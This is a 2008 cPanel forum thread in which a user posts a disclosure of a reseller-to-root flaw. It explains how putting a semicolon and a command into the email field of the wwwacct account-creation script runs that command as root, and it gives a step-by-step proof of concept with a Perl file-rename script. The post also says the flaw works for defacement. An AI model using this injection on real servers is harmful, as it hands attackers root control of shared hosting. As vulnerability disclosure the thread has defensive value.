Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

bug report : root access with a reseller account.

Discussion in 'General Discussion' started by php-empire, Nov 8, 2008.

  1. php-empire

    php-empire Registered

    Joined:
    Jun 27, 2007
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    51
    PHP:
    ('binary' encoding is not supportedstored as-isBy Ali Jasbi IHST security hacking Research teamWwW.Hackerz.ir
    Vendor 
    Cpanel.net
    Version 
    ALL !!
    Risk Very high
    What u can 
    do with this bug is :
    u can have a access to all the server with reseller privilege (Th3 r00t)
    how it's work ?
    when u want to create an account in shell what will happen ?
    ./script/wwwact [domainname] [username] [password] [Email address] lab lab lab
    that u can run it with a web base program ! ( cpanel : doamin:2086)
    example :
    http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab
    it means you got a access to wwwacct in the scripts folder (Th3 r00t)
    so u can run other command with root access like that
    ./scripts/wwwactt domain.com domain password ali_at_hackerz.ir;./home/hackerz/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)
    that u can Likewise run it on the web base program.what u need to do is just write ali_at_hackerz.ir;./home/hackerz/public_html/do.pl in Email text box when u want to create an account.
    ()()()()()()()()()()()()()
    Test it:
    ++++++++++++++++++++++++++
    Step 1

    Save this file in /home/user/public_html/do.pl .
    #!/usr/bin/perl
    $old='
    /home/user/public_html/test.txt';
    $new='
    /home/root/kon.txt';
    rename $old, $new;
    ++++++++++++++++++++++++++
    step 2

    make a text file named test.txt in your public_html directory.
    path will be : /home/user/public_html/test.txt .
    ++++++++++++++++++++++++++
    step 3

    create an account and write ali_at_hackerz.ir;./home/user/public_html/do.pl in E-mail Address text box
    then click on the "create" button.
    Yes , you can find your file in /home/root/ .
    ++++++++++++++++++++++++++
    ()()()()()()()()()()()()()
    you can run your own code !(mass defacer, exploit'
    or everything that u want).
    Enjoy it... 

    hello cpanel security team
    you patch this bug in new version ?
    very cretical:(
     
  2. weetabix

    weetabix Well-Known Member

    Joined:
    Oct 26, 2006
    Messages:
    59
    Likes Received:
    3
    Trophy Points:
    158
  3. php-empire

    php-empire Registered

    Joined:
    Jun 27, 2007
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    51
    very thank u
    have a good time :)
     
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice